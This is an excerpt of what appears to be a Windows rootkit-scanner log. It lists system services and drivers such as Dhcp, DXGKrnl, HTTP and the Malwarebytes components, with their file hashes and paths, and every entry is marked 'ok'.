20:47:08.0940 0x1e50  [ 5EAEF67AE2AF4D2DC664B649DB7B2E16, ADAC7FD6AC12B50F4998C5EB0BD770DD4B80A94C4CC1B9376AD77648E48D012D ] DeviceAssociationService C:\windows\system32\das.dll
20:47:08.0956 0x1e50  DeviceAssociationService - ok
20:47:09.0003 0x1e50  [ 799BE46D45D486704CE0F37CA5385262, BB78DEE83B9DB613B1C083D55FAA458BE3E394AED80EB91B599185A7272F33B3 ] DeviceInstall   C:\windows\system32\umpnpmgr.dll
20:47:09.0018 0x1e50  DeviceInstall - ok
20:47:09.0065 0x1e50  [ 431141C6859990824D17F71C30A78728, 448B3DC20C8FDD5B66217E0E01DBCC4904F94BDA0826F109D139DDD2C2D7FBF2 ] Dfsc            C:\windows\system32\Drivers\dfsc.sys
20:47:09.0065 0x1e50  Dfsc - ok
20:47:09.0112 0x1e50  [ 9E0E72222264745ADEB0E5AC680B0ED6, 576AFC8741695396A3B8E9DBDD3703E9D70370437D09D162262E47A140D101B4 ] Dhcp            C:\windows\system32\dhcpcore.dll
20:47:09.0128 0x1e50  Dhcp - ok
20:47:09.0159 0x1e50  [ 3C736FAE17BA6F91BA37594AAB139CD0, 34304A194105B19E7ADD80108DC85C3B7AA9E942C84A7EF93C475CE1D9AE4615 ] discache        C:\windows\system32\drivers\discache.sys
20:47:09.0174 0x1e50  discache - ok
20:47:09.0221 0x1e50  [ AE3786294CC246A5403783E1B86A0168, 29A7B4B490CBB16DAEF5D67D0A58A2577CF3FEE8F889484DB867F6913D9D2A28 ] disk            C:\windows\system32\drivers\disk.sys
20:47:09.0221 0x1e50  disk - ok
20:47:09.0252 0x1e50  [ 82A7C72593793FE1EADA7A305BD1567A, 75F432E4C75AE9EFF553BD860B3B250853BDDA85C17DBD9B7242D74593506A86 ] dmvsc           C:\windows\System32\drivers\dmvsc.sys
20:47:09.0252 0x1e50  dmvsc - ok
20:47:09.0299 0x1e50  [ 066B9710B36AB550E01EEFCA52155968, DCA9F3F4856A6866D3F5A2EEE34E96A83F40198DB0B5AC6381A7568DE1F56FAB ] Dnscache        C:\windows\System32\dnsrslvr.dll
20:47:09.0299 0x1e50  Dnscache - ok
20:47:09.0346 0x1e50  [ 9949AD2ABA168A618D46C799D6CC898C, DFAC86A0AEE83C9EFE1BEE9EC15C8CAF1D619D55AF3ACC3986057A5AC985D06A ] dot3svc         C:\windows\System32\dot3svc.dll
20:47:09.0346 0x1e50  dot3svc - ok
20:47:09.0377 0x1e50  [ 109FC3F80BF4F4DC5A071058074F13C1, F30736F45BA1811D59E9CB1C172D8D1EA9F5A7D36DCFFBFC9E7E02448C1CF851 ] DPS             C:\windows\system32\dps.dll
20:47:09.0377 0x1e50  DPS - ok
20:47:09.0424 0x1e50  [ 9C7C183F937951AE17C5B8B3259CF3FF, 8ED607139F15D08B4835ACF864421BA4C08C88FE90B9AAF707F5D8514D7731B1 ] drmkaud         C:\windows\system32\drivers\drmkaud.sys
20:47:09.0424 0x1e50  drmkaud - ok
20:47:09.0471 0x1e50  [ F87F4AAAF6664906248D11D5E579A53B, F283932F68ED93891EEF00C18724359AB7057E922A3CDC8BC6F33F84D2B0BEE5 ] DsmSvc          C:\windows\System32\DeviceSetupManager.dll
20:47:09.0486 0x1e50  DsmSvc - ok
20:47:09.0580 0x1e50  [ 2BB5627EB587FA995086C3D8C21B6D3F, 871E35BBE66180781324D38823B74263B660CF9254EE348A15421FAC5667F294 ] DXGKrnl         C:\windows\System32\drivers\dxgkrnl.sys
20:47:09.0632 0x1e50  DXGKrnl - ok
20:47:09.0663 0x1e50  [ 58BA473DD88F5FC1932282BA683AA03E, B8A4407D3006D91BE88F9C5389AC1CACC73BEBF6F66433A1E5EB8E58E8836C12 ] Eaphost         C:\windows\System32\eapsvc.dll
20:47:09.0663 0x1e50  Eaphost - ok
20:47:09.0803 0x1e50  [ 5AB97B3282D7D6114949D1EB5C8598E4, FB9449CC1CDC12C12AA0469BB6ACC770CB011250EDFD86E9600E754610608EFD ] ebdrv           C:\windows\system32\drivers\evbda.sys
20:47:09.0881 0x1e50  ebdrv - ok
20:47:09.0928 0x1e50  [ F1DA34D64F2BA200D28A7451804E2FEE, 8BDF328F18F1EB58AC0E383ABA7985BA69EA9622B262CD524E3390FDE824DEEB ] EFS             C:\windows\System32\lsass.exe
20:47:09.0928 0x1e50  EFS - ok
20:47:09.0959 0x1e50  [ 66D60BD9A4C05616ABECA2A901475098, 8111550DB03FFD72F1822F47B16F075DA92874B64F19342D7CF60B0EE648AFEF ] EhStorClass     C:\windows\system32\drivers\EhStorClass.sys
20:47:09.0959 0x1e50  EhStorClass - ok
20:47:09.0991 0x1e50  [ A61D0F543024E458C0FE32352E1978E2, BDE6BC140300EAF790F16466C28897CE0BD7D94DCED13FDE20AA4AACA0F6A4FD ] EhStorTcgDrv    C:\windows\system32\drivers\EhStorTcgDrv.sys
20:47:09.0991 0x1e50  EhStorTcgDrv - ok
20:47:10.0022 0x1e50  [ D790D058D67582DB9C84C2D33695FE6B, A5763D7F6D191EA4B290B3E92D842AC36FD46DF598472E70B46E45D8CCD2F912 ] ErrDev          C:\windows\System32\drivers\errdev.sys
20:47:10.0022 0x1e50  ErrDev - ok
20:47:10.0100 0x1e50  [ F9E01C2D9F8BC049E04CF5DC24A5F638, CB6CCB59C77D4A59DDA846608AABEF1DFEC24C8422712AB8D59E27C13D731D2E ] EventSystem     C:\windows\system32\es.dll
20:47:10.0115 0x1e50  EventSystem - ok
20:47:10.0147 0x1e50  [ 7A4D6FEB8C52B3FE855E4DCDF9107E03, 6B0146A4C9AD32DCDC2DEE8E8C5A29F687665458486449E0D37B151ED63B8ADC ] exfat           C:\windows\system32\drivers\exfat.sys
20:47:10.0147 0x1e50  exfat - ok
20:47:10.0193 0x1e50  [ 60996602A7111FD2D086E803F33E4282, E62A91C90F8542990BEA4E6A5D9DD3D070F4EB23B4C13414C5DA2B0219509749 ] fastfat         C:\windows\system32\drivers\fastfat.sys
20:47:10.0193 0x1e50  fastfat - ok
20:47:10.0240 0x1e50  [ F0E7F8382ED5E138B0DFA4CB5058BCFE, 6247C7B75F975F5AB080FFB9881EF58A6F360219F7AF2DE871F38E80CAF3B62C ] Fax             C:\windows\system32\fxssvc.exe
20:47:10.0271 0x1e50  Fax - ok
20:47:10.0303 0x1e50  [ 73B2D11DF0B6E03A0CB0323218ACB3E4, BA9256919BAA2E0760F6A658B557FDC389ACE8F9820D1A41FD995FC5613F5AA6 ] fdc             C:\windows\System32\drivers\fdc.sys
20:47:10.0303 0x1e50  fdc - ok
20:47:10.0318 0x1e50  [ 0828E3E7BD77C89149EAD3232BFD38DB, A6A296647A4EDBFF59124E3A9C0AB48759AA1738615ACFA5A454FF6BD3C31BA2 ] fdPHost         C:\windows\system32\fdPHost.dll
20:47:10.0334 0x1e50  fdPHost - ok
20:47:10.0349 0x1e50  [ 872506AAB591E8908DF4461475AF92DF, 772F2D08CB95775E438822B9EA005CBA92ED4071ADAB2C0101156A7D037D4704 ] FDResPub        C:\windows\system32\fdrespub.dll
20:47:10.0349 0x1e50  FDResPub - ok
20:47:10.0474 0x1e50  [ 0588950D93A426F97C7AAADB1A9B0458, ABCB3619BD58CAC438FC032495AE45A7B6FFDD4BD33C1B3D1BC7F9F13FCB727A ] fhsvc           C:\windows\system32\fhsvc.dll
20:47:10.0474 0x1e50  fhsvc - ok
20:47:10.0490 0x1e50  [ 88A9EBACD1058ABB237A6B4E96E7F397, 263D25D33B679EB01D97763701347C31B2F72E28CE2C7EC8013EA77756D98BE1 ] FileInfo        C:\windows\system32\drivers\fileinfo.sys
20:47:10.0505 0x1e50  FileInfo - ok
20:47:10.0521 0x1e50  [ 9E4EE3A0B00FF7D5F42A4AF9744CBA02, 1D7BFB00D74A28AC13ECBA1E0036D50EE79266AC02CEDB2632466BF9DD46F211 ] Filetrace       C:\windows\system32\drivers\filetrace.sys
20:47:10.0521 0x1e50  Filetrace - ok
20:47:10.0552 0x1e50  [ B1D4C168FF7B8579E3745888658FFB1D, 1A5C13E902A0C788A8B995ADD2FBC3303005911C0AA3F3F4497D3016AA0EF583 ] flpydisk        C:\windows\System32\drivers\flpydisk.sys
20:47:10.0552 0x1e50  flpydisk - ok
20:47:10.0583 0x1e50  [ B33EC133AE4E6C1881D2302D93D2467D, 77E3A16257EA3698B3FCD947D004144E8D1EEE48EF5C82DF49B1B9B2B3C61DB2 ] FltMgr          C:\windows\system32\drivers\fltmgr.sys
20:47:10.0599 0x1e50  FltMgr - ok
20:47:10.0677 0x1e50  [ 0BCDC0FF11B984162B0CF0FF6E9E0146, D44A3CECBA36B7A64854E244FA6B5E65047896BF9983D20B431410FBBA36697A ] FontCache       C:\windows\system32\FntCache.dll
20:47:10.0724 0x1e50  FontCache - ok
20:47:10.0786 0x1e50  [ 0B56259F5611787222A04A8F254E51D4, F77AEC0ACBFAF9154E32223B84B613229DACCD953AEBC3E96C27570F9AB10FD0 ] FontCache3.0.0.0 C:\windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
20:47:10.0786 0x1e50  FontCache3.0.0.0 - ok
20:47:10.0802 0x1e50  [ A5F7873A39E4E9FAAAE59B7E9E36B705, 32036109F5A50E9F3BEF97C5B28AE8179B3A5E22517868A83CADE4671FF90DEC ] FsDepends       C:\windows\system32\drivers\FsDepends.sys
20:47:10.0802 0x1e50  FsDepends - ok
20:47:10.0833 0x1e50  [ A6DD7D491F587F4BC13FB972977DC8E8, B86F97F17F6F443EC16DEF67CCA4EF78AFE56078D2877838A982FECB19557C87 ] Fs_Rec          C:\windows\system32\drivers\Fs_Rec.sys
20:47:10.0833 0x1e50  Fs_Rec - ok
20:47:10.0880 0x1e50  [ C1646A95EAC515F60CDB2A7A8A013C1E, F559B83C02B17265EDE95DD497C1A94E402F07EC251FC47449F789907AFFED14 ] fvevol          C:\windows\system32\DRIVERS\fvevol.sys
20:47:10.0895 0x1e50  fvevol - ok
20:47:10.0942 0x1e50  [ A969D92973DFA895E7776B4BFE36DBB2, 7528E6983ECC59291A7A386E4E459B19D1593ABDDFFD276E2F01B0EA21693E20 ] FxPPM           C:\windows\System32\drivers\fxppm.sys
20:47:10.0942 0x1e50  FxPPM - ok
20:47:10.0989 0x1e50  [ 52BC441E07A827EBAB70CDC7EAEDB28D, 8DECBD8E12EA52039742599CFBBF0D3B6610B57EF8D9DAEEEA33D202A478D286 ] gagp30kx        C:\windows\system32\drivers\gagp30kx.sys
20:47:10.0989 0x1e50  gagp30kx - ok
20:47:11.0020 0x1e50  [ 8E98D21EE06192492A5671A6144D092F, B8F656B34D361EA5AFB47F3A67AB2221580DADA59C8CD0CB83181E4AD8B562B4 ] GEARAspiWDM     C:\windows\system32\DRIVERS\GEARAspiWDM.sys
20:47:11.0020 0x1e50  GEARAspiWDM - ok
20:47:11.0051 0x1e50  [ 721F8EEF5E9747F32670DEFF7FB92541, E0A8EF70753E260C2C7D93D316B5EF9589DB086FDF829BDA2958C6A09CE471A6 ] gencounter      C:\windows\System32\drivers\vmgencounter.sys
20:47:11.0051 0x1e50  gencounter - ok
20:47:11.0114 0x1e50  [ 4E1D0A246E10CFDDBF856432418DE404, 17AC5322A50D0914F90F41E9CBFEBE04CDC3BCA1CFAFE8A3F6CADD305738E1AF ] GFNEXSrv        C:\Program Files (x86)\Toshiba\Password Utility\GFNEXSrv.exe
20:47:11.0114 0x1e50  GFNEXSrv - ok
20:47:11.0176 0x1e50  [ FC2B8B06BDBD3B6457F5A3DA9AD2410E, 4BF196E1CAC94E9265EBEB68F41C3E29F0C709ECFF9420B5B1C9C82680D5D6A8 ] GPIOClx0101     C:\windows\system32\Drivers\msgpioclx.sys
20:47:11.0176 0x1e50  GPIOClx0101 - ok
20:47:11.0270 0x1e50  [ 5358678C6370F2ADC5291849F6503262, 841633D7A936C3889690C67E189BAD4C6B294C196FFFE5B564FCECDFE46A9E52 ] gpsvc           C:\windows\System32\gpsvc.dll
20:47:11.0316 0x1e50  gpsvc - ok
20:47:11.0379 0x1e50  [ 630555943E5A3FE21010CE91EC7FC84F, 20D7247A4363EE9E851501D89A466564ADCAEC304DE42280E4E09AD8499436A9 ] HdAudAddService C:\windows\system32\drivers\HdAudio.sys
20:47:11.0379 0x1e50  HdAudAddService - ok
20:47:11.0426 0x1e50  [ 58CC013EFA9893057160EDA018D8ADCE, BE8AA220CFBD90202C1B130DF349C3198E3447F3C2DC7BC5FC8816F57F78BA00 ] HDAudBus        C:\windows\System32\drivers\HDAudBus.sys
20:47:11.0426 0x1e50  HDAudBus - ok
20:47:11.0457 0x1e50  [ 3F76BBA53D65E85A7F53E7A71082082C, D1E18815BB19CD11007C4A66162C76F55D4FE6B09B34ED45969C7ECC29D394AD ] HidBatt         C:\windows\System32\drivers\HidBatt.sys
20:47:11.0457 0x1e50  HidBatt - ok
20:47:11.0504 0x1e50  [ 085F150D002B7F0153D3C06DDF33A143, 41847FD02608ECFE3A6B4B38CBDE8416B0EF17491868511FD704B0BCC280338E ] HidBth          C:\windows\System32\drivers\hidbth.sys
20:47:11.0504 0x1e50  HidBth - ok
20:47:11.0535 0x1e50  [ CC4A07E51D89575CAB6F4EB590D87CD4, DFB4EAF0923EF9FF6C42EDD1EA5E4025F243C9BE2D03D5423FE8A897DC01D657 ] hidi2c          C:\windows\System32\drivers\hidi2c.sys
20:47:11.0535 0x1e50  hidi2c - ok
20:47:11.0582 0x1e50  [ DC96F7DACB777CDEAEF9958A50BFDA06, 7CE79F32D5EE65C0178CFF56523825D3EE01095B2CE8C67634A6604A821A9086 ] HidIr           C:\windows\System32\drivers\hidir.sys
20:47:11.0582 0x1e50  HidIr - ok
20:47:11.0607 0x1e50  [ FAC37D7B3D6354A5A5E19A45B50B4008, 2962B552A1DA545DFDEF0886582E82596FE8A3A19AAF989B025AFDA84D16D4EC ] hidserv         C:\windows\system32\hidserv.dll
20:47:11.0607 0x1e50  hidserv - ok
20:47:11.0639 0x1e50  [ 012C354B4AB48E9A7A657DF39E3A2073, B15D0089CE509FF1CF73DFE095425C1C99FC3971622DCAAD9CAEB989A12A4FDB ] HidUsb          C:\windows\System32\drivers\hidusb.sys
20:47:11.0654 0x1e50  HidUsb - ok
20:47:11.0685 0x1e50  [ 43F884B61A24377567CD0FEB35236334, B3BA36B527C8D6D83DE2FBCD8D503B87FD2611BF15B07A7BC138DC8BAE6A50C1 ] hkmsvc          C:\windows\system32\kmsvc.dll
20:47:11.0685 0x1e50  hkmsvc - ok
20:47:11.0748 0x1e50  [ 33DFC14DFDCCFA7AA10E392F6A8EC1CF, E6967F3F465C6E903221BC0FCBAE7D05FD18C0BF110D929335F5935364B3C1BC ] HomeGroupListener C:\windows\system32\ListSvc.dll
20:47:11.0763 0x1e50  HomeGroupListener - ok
20:47:11.0841 0x1e50  [ E0D9F6FE18FA7F53ADD29AF719CE2B7E, B965DCC72625188F3B896CB447B7696F22687266EAFC5AA270E2AD53DD9F324D ] HomeGroupProvider C:\windows\system32\provsvc.dll
20:47:11.0857 0x1e50  HomeGroupProvider - ok
20:47:11.0919 0x1e50  [ 64DB7A8D97CA53DCCF93D0A1E08342CF, 02CAB7F28D3830C482683425C60044239C6F1562556688A274CA2C237C846E76 ] HpSAMD          C:\windows\system32\drivers\HpSAMD.sys
20:47:11.0919 0x1e50  HpSAMD - ok
20:47:12.0029 0x1e50  [ 82C47A85494249623F40E43C7B04051C, 97EF087B49219B68686914B250634FF67D13B7D3F81562614F108D2A40BEBA54 ] HPSupportSolutionsFrameworkService C:\Program Files (x86)\Hp\Common\HPSupportSolutionsFrameworkService.exe
20:47:12.0029 0x1e50  HPSupportSolutionsFrameworkService - ok
20:47:12.0107 0x1e50  [ F4A91D985EB9D1D2717D538F3424603C, 454AD2FF3A7963B9835AEF300F6672F92D0CCF59593BA2CCC83F0EC1446BB659 ] HTTP            C:\windows\system32\drivers\HTTP.sys
20:47:12.0122 0x1e50  HTTP - ok
20:47:12.0169 0x1e50  [ 2A98301068801700906C06649860FE94, 664394A52326289DCA0828B0041A105653F4FEF3E3DCCC3787AAE0F6FDC73A14 ] hwpolicy        C:\windows\system32\drivers\hwpolicy.sys
20:47:12.0169 0x1e50  hwpolicy - ok
20:47:12.0185 0x1e50  [ DC76901D82097C9E297F20C287CB9A27, 01A412D0D8A65050BE4250A7C4B9F98A4C43FD891827761E0C830369A5F9F09C ] hyperkbd        C:\windows\System32\drivers\hyperkbd.sys
20:47:12.0185 0x1e50  hyperkbd - ok
20:47:12.0216 0x1e50  [ 716413AB3CA12DE0A7222D28C1C9352C, B82B586BD9DBD70DDA19A02504E8CB00DA53677703AB848B53387601C5BAD3D3 ] HyperVideo      C:\windows\system32\DRIVERS\HyperVideo.sys
20:47:12.0216 0x1e50  HyperVideo - ok
20:47:12.0231 0x1e50  [ C9E9CBF73AFFBFE3E801EFB516787BA3, 1A850D614BDA6AA4195CC657702BC6242BA51B90131717743182AA160F65E72C ] i8042prt        C:\windows\System32\drivers\i8042prt.sys
20:47:12.0231 0x1e50  i8042prt - ok
20:47:12.0278 0x1e50  [ 5E394EBD26FD68AA9300332C46BEDD62, 56A5DA7CE08C07B519E55D0A46AA9D10B640349808EFE02B3278267B75B5F603 ] iaStorV         C:\windows\system32\drivers\iaStorV.sys
20:47:12.0294 0x1e50  iaStorV - ok
20:47:12.0309 0x1e50  [ 24847A06B84339FEEDE5CABF3D27D320, 7727B1DAD0D4A1D474FBBEFCEBDF36A1F07D1AA300869AE57A24ED91BF84B6B4 ] iirsp           C:\windows\system32\drivers\iirsp.sys
20:47:12.0309 0x1e50  iirsp - ok
20:47:12.0403 0x1e50  [ E455C83E029121270BED73CDAC381F37, 433D525C19DBF26FAC28853C606C872D973104842B0EF1B2BF2EAC85457E2953 ] IKEEXT          C:\windows\System32\ikeext.dll
20:47:12.0434 0x1e50  IKEEXT - ok
20:47:12.0606 0x1e50  [ 3E6A9B228D7FC87C3A1C731B79BD0499, F203C3645419095989594313625AF1FB83A5F9B7F8A495A8EBCB63DFBF00D7ED ] IntcAzAudAddService C:\windows\system32\drivers\RTKVHD64.sys
20:47:12.0699 0x1e50  IntcAzAudAddService - ok
20:47:12.0731 0x1e50  [ 4F37726CF764CA18A8A84F85EF3A7F24, 6212B23917526E127CE641A11A58DA93651FFE70829C4079FE465DBDC81CF470 ] intelide        C:\windows\system32\drivers\intelide.sys
20:47:12.0731 0x1e50  intelide - ok
20:47:12.0793 0x1e50  [ E15CDF68DD73423F15D4AC404793AF0D, E2D0136AF68D1A73EB3A63C83284B4661222CB0A4AFACCF276CB57CBD4850287 ] intelppm        C:\windows\System32\drivers\intelppm.sys
20:47:12.0793 0x1e50  intelppm - ok
20:47:12.0824 0x1e50  [ 8FCA66234A0933D796BB780B7953BAB9, 7DD677F5EE09A8D7A75C9E475B5E6B3DCA49D1E846C7D160B839D7029B1C5B6D ] IpFilterDriver  C:\windows\system32\DRIVERS\ipfltdrv.sys
20:47:12.0824 0x1e50  IpFilterDriver - ok
20:47:12.0902 0x1e50  [ C217B8D2E58C57A319B16125C3D4B69C, 905BB858E1782BD08FF080A4A604CE662440A15601B178FBD30269C306C04CCF ] iphlpsvc        C:\windows\System32\iphlpsvc.dll
20:47:12.0918 0x1e50  iphlpsvc - ok
20:47:12.0965 0x1e50  [ A4071DA3AE419F9694BFCB267C7DB8D7, 392DEE1DA51606C29418A98D2861F115E9F67C688B4281C53E87BA73A98809FB ] IPMIDRV         C:\windows\System32\drivers\IPMIDrv.sys
20:47:12.0965 0x1e50  IPMIDRV - ok
20:47:12.0996 0x1e50  [ 3969B9C218DD3FAA9F4ED2FFC3651C02, 93447F124CC55FB17055126432194153E1BB8F0FD95A47608494B6834A5F7089 ] IPNAT           C:\windows\system32\drivers\ipnat.sys
20:47:13.0011 0x1e50  IPNAT - ok
20:47:13.0058 0x1e50  [ 6BF622C46721CF6E2B35E868F319E6EB, 926D3C6334D8AF8A248A361D1F7C0A655835572ED8AC6F1D7932E1FA7A26B50A ] iPod Service    C:\Program Files\iPod\bin\iPodService.exe
20:47:13.0074 0x1e50  iPod Service - ok
20:47:13.0105 0x1e50  [ 25CD7C4BB2863FFC2B0B311F0AEBF77C, 4099BAA2DB4ADB93B878D71E241B7D9EB7E0EE7ED0FE2450CCB9E4718B3726EB ] IRENUM          C:\windows\system32\drivers\irenum.sys
20:47:13.0105 0x1e50  IRENUM - ok
20:47:13.0136 0x1e50  [ D940C5BB9DC92E588533C19ABCC3D2C2, D1442854CEDE86F2C187A35851E74C873D34B772C60BC118FA1577F79C03364D ] isapnp          C:\windows\system32\drivers\isapnp.sys
20:47:13.0136 0x1e50  isapnp - ok
20:47:13.0183 0x1e50  [ E6530FD4F61B40F338BF4355A21B9A09, FE9BF039B9901BEC260A69F7C49ACFA9881AD470DCCBA70C7EC36F518DA71702 ] iScsiPrt        C:\windows\System32\drivers\msiscsi.sys
20:47:13.0199 0x1e50  iScsiPrt - ok
20:47:13.0214 0x1e50  [ 8FBD94B69D6423E20ABCD59D86368B21, 218EF992095E365EC917413749856A64D55D8129D77098E24D670843233377F4 ] kbdclass        C:\windows\System32\drivers\kbdclass.sys
20:47:13.0230 0x1e50  kbdclass - ok
20:47:13.0261 0x1e50  [ E88C932ABDF8185A62C8F2FC7B051FB6, 67F9AF58237A11F0BF3D15AA5B32E5CE66B7AA039B999D938F7F6E63DCEA7A6E ] kbdhid          C:\windows\System32\drivers\kbdhid.sys
20:47:13.0261 0x1e50  kbdhid - ok
20:47:13.0292 0x1e50  [ FB6C185092E18011EF49989425C2AA87, 043524409E0A764201DD221C48B7DEEA0D161945EB37D4B88313BAB2299949DF ] kdnic           C:\windows\system32\DRIVERS\kdnic.sys
20:47:13.0292 0x1e50  kdnic - ok
20:47:13.0308 0x1e50  [ F1DA34D64F2BA200D28A7451804E2FEE, 8BDF328F18F1EB58AC0E383ABA7985BA69EA9622B262CD524E3390FDE824DEEB ] KeyIso          C:\windows\system32\lsass.exe
20:47:13.0308 0x1e50  KeyIso - ok
20:47:13.0370 0x1e50  [ 8B3EB6372436195B8EA8AE09A184BCE2, 9AFB7A9D6AEEBF5994C85B355155024768116E2D537C9FA169BC3F4594ECD35C ] KSecDD          C:\windows\system32\Drivers\ksecdd.sys
20:47:13.0370 0x1e50  KSecDD - ok
20:47:13.0417 0x1e50  [ 3DD9C86EA88E8B5A51904AD87E1F2E78, F9EC9A571212117C01934CD29057EB1B3FA095F670294244AF7D9387D3F6E555 ] KSecPkg         C:\windows\system32\Drivers\ksecpkg.sys
20:47:13.0417 0x1e50  KSecPkg - ok
20:47:13.0464 0x1e50  [ 81492FEEBF2F26455B00EE8DBAE8A1B0, E33AA2DFB2D3BB30B02CDADA2EC290F86329DA3198327A653F39A843D86390B9 ] ksthunk         C:\windows\system32\drivers\ksthunk.sys
20:47:13.0464 0x1e50  ksthunk - ok
20:47:13.0542 0x1e50  [ 5825DBACEDC3812B5CF8D40B997BF210, 1C2997BCC707C1029B21876E093038CE3BBF6E6694B4CCF7EEDD47172ED9A541 ] KtmRm           C:\windows\system32\msdtckrm.dll
20:47:13.0542 0x1e50  KtmRm - ok
20:47:13.0589 0x1e50  [ 256EE31588257E8A555DBFAA13F1908E, B6817F632EDEA483E35BF26846DCDD4E95E860620959179B2A5D8AD7EEDDB126 ] LanmanServer    C:\windows\system32\srvsvc.dll
20:47:13.0612 0x1e50  LanmanServer - ok
20:47:13.0627 0x1e50  [ 16650912BE5A94B40E0B3B4C39652B56, 908C2C9367AE0AC9AECB5D91514BB33ACD746D99F19C1A8DD6A9550E9CAD9E00 ] LanmanWorkstation C:\windows\System32\wkssvc.dll
20:47:13.0643 0x1e50  LanmanWorkstation - ok
20:47:13.0690 0x1e50  [ CEEFD29FC551F289810B0B9381B321DC, 900F206B487B2190D9363F28AA4BA0CD7DCFE1D005BE05A48AF74B1B81194691 ] lltdio          C:\windows\system32\DRIVERS\lltdio.sys
20:47:13.0690 0x1e50  lltdio - ok
20:47:13.0736 0x1e50  [ BCF53485E0A94722CDE3C4A93CD8EB8C, D24E1066EB102245A89A5D17D608DB9DF6B71C99F1C77E070B95EFD17D268141 ] lltdsvc         C:\windows\System32\lltdsvc.dll
20:47:13.0736 0x1e50  lltdsvc - ok
20:47:13.0768 0x1e50  [ 5A2F7F1CBC2E631A497DAD16164E06D2, 35274FC6C386380B01B5E8F467E71A2C4E2FB2AD701554F9B1A9B036B0340142 ] lmhosts         C:\windows\System32\lmhsvc.dll
20:47:13.0768 0x1e50  lmhosts - ok
20:47:13.0814 0x1e50  [ 022CDD12161B063D7852B1075BF3FFF2, E21267243AF2FC208D27E67827B1264A762C99AECEDB7AD2C48A04F421A6B2F0 ] LSI_SAS         C:\windows\system32\drivers\lsi_sas.sys
20:47:13.0814 0x1e50  LSI_SAS - ok
20:47:13.0830 0x1e50  [ 07AD59D669B996F29F91817F0ECFA34F, 026F332F862D142BFFC9D169CCD17A35BFB6B301EEC72AA13E16369B3520919C ] LSI_SAS2        C:\windows\system32\drivers\lsi_sas2.sys
20:47:13.0846 0x1e50  LSI_SAS2 - ok
20:47:13.0877 0x1e50  [ 216FB796AA4E252ACCE93B1BCB80B5EC, 5B1E49B5F7B9C7A778198D27F8EE500FE35DC32D40B22A3D6ED67560BEB04212 ] LSI_SCSI        C:\windows\system32\drivers\lsi_scsi.sys
20:47:13.0877 0x1e50  LSI_SCSI - ok
20:47:13.0908 0x1e50  [ 5E80530AF37102488EE980B4A92AF99F, 364E18EAD9AC22F8A306B24C6C43E58224F6BE2744EFEAA2484696B8D9880851 ] LSI_SSS         C:\windows\system32\drivers\lsi_sss.sys
20:47:13.0908 0x1e50  LSI_SSS - ok
20:47:13.0970 0x1e50  [ 1DC9B701F8EB7D67774035AC9C3104F6, 77371267CDA605F78674BF8FA14B134B22299CD96EADA60A68762207595F0B46 ] LSM             C:\windows\System32\lsm.dll
20:47:13.0986 0x1e50  LSM - ok
20:47:14.0017 0x1e50  [ 2BDC5D711FA61307CE6190D47C956368, 6BCDC6CBB9783F1ABE8957BDA94AF977DFB2A310BB6D19085EFC8609C97FD180 ] luafv           C:\windows\system32\drivers\luafv.sys
20:47:14.0017 0x1e50  luafv - ok
20:47:14.0080 0x1e50  [ 7991C0E7A33CF921FDE54D7D2807E41B, A68B652429A08564710FF09B3DDF81211C1802DFF9B522128763AAB29A43E574 ] MBAMProtector   C:\windows\system32\drivers\mbam.sys
20:47:14.0080 0x1e50  MBAMProtector - ok
20:47:14.0189 0x1e50  [ 6EE5EA44AC06A52CE03ACD37281E078D, A65CF98E0C2EEED10FD9A3CBFB8D5E8317A16EC522F798338FBFB971651233C0 ] MBAMScheduler   C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
20:47:14.0236 0x1e50  MBAMScheduler - ok
20:47:14.0298 0x1e50  [ 5E30FA7FFB73198C1AEEE8A1B97ED9BF, 62F5A61E33DA7ADEA9EBB32C1FEBFE58F6A267B01C4D6BE646ED7C154DEA662F ] MBAMService     C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
20:47:14.0314 0x1e50  MBAMService - ok
20:47:14.0392 0x1e50  [ 8A50D5304E6AE48664CF5838EC32F647, C76943FABEE1B5E1B641AA610668CCD4227E2C4B191DD30B79D3AB31A9E8B5BE ] MBAMSwissArmy   C:\windows\system32\drivers\MBAMSwissArmy.sys
20:47:14.0392 0x1e50  MBAMSwissArmy - ok
20:47:14.0438 0x1e50  [ 9073CAC1BF4CE98EC89A805261FDF296, 6290D2512872E7B797A8D0F9246404CB86655F0F38412DCF4E3F63CB94AC2F9B ] MBAMWebAccessControl C:\windows\system32\drivers\mwac.sys
20:47:14.0438 0x1e50  MBAMWebAccessControl - ok
20:47:14.0470 0x1e50  [ 9B0D829C3BE4E7472DB9DD2B79908E3C, ACED5806FFF39E84007B5A3DCB16315329DC53007F46B1BEEDC391CC659F7DD3 ] megasas         C:\windows\system32\drivers\megasas.sys
20:47:14.0470 0x1e50  megasas - ok
20:47:14.0516 0x1e50  [ ECC3F54C7AFC318271C4F0B4606D8DB0, FD1ACB18B8C912C7A57DABCD5460800DD0721A82E09C8D79C47B3392D61CBEA6 ] MegaSR          C:\windows\system32\drivers\MegaSR.sys
20:47:14.0532 0x1e50  MegaSR - ok
20:47:14.0563 0x1e50  [ EEE908BE7143FCA48CF0CB87214E2AB8, 4F9BD299F559DD36DBD93489CFAA753F236FBB70946E034D2E2260059AE20962 ] MMCSS           C:\windows\system32\mmcss.dll
20:47:14.0579 0x1e50  MMCSS - ok
20:47:14.0594 0x1e50  [ 780098AD5DA8A4822E2563984C85EF7B, 29312970774E944B5ED388316CF3D350DCABF721F9695737B0AC56BE878B0446 ] Modem           C:\windows\system32\drivers\modem.sys
20:47:14.0594 0x1e50  Modem - ok
20:47:14.0641 0x1e50  [ EA8EAD3F5B762F889CC7F3966625B48B, B701A42E5E08B7BC6601560446146803182E5DC631AB73E9408F19CB6432F121 ] monitor         C:\windows\System32\drivers\monitor.sys
20:47:14.0641 0x1e50  monitor - ok
20:47:14.0672 0x1e50  [ 618446B98C79776654340CE27C73485E, EFE7169FDD545933B5949DA2D09266971C0C3E6894E7BD8AFE29E41567C72B16 ] mouclass        C:\windows\System32\drivers\mouclass.sys
20:47:14.0672 0x1e50  mouclass - ok
20:47:14.0704 0x1e50  [ C0ADEBED913295803B579ED288936CBB, 58F71541166D1DA07C18FBD27458D55E3F8AD7291CB7496B3A2F01372A5B0CAE ] mouhid          C:\windows\System32\drivers\mouhid.sys
20:47:14.0704 0x1e50  mouhid - ok
